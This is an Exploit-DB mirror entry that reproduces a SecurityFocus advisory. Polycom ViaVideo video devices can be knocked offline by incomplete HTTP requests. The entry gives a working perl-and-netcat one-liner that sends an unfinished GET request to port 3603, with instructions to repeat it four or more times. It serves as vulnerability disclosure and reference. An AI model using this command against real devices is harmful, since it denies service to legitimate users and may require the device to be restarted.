exploit-db-mirror/exploits/hardware/dos/21939.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
467 B
Text

source: https://www.securityfocus.com/bid/5962/info
Polycom ViaVideo devices are prone to a denial of service condition upon receipt of numerous incomplete HTTP requests. This may restrict availability of the device for legitimate users.
The device may need to be restarted to regain normal functionality.
perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
Issue the above command four or more times to cause the denial of service condition.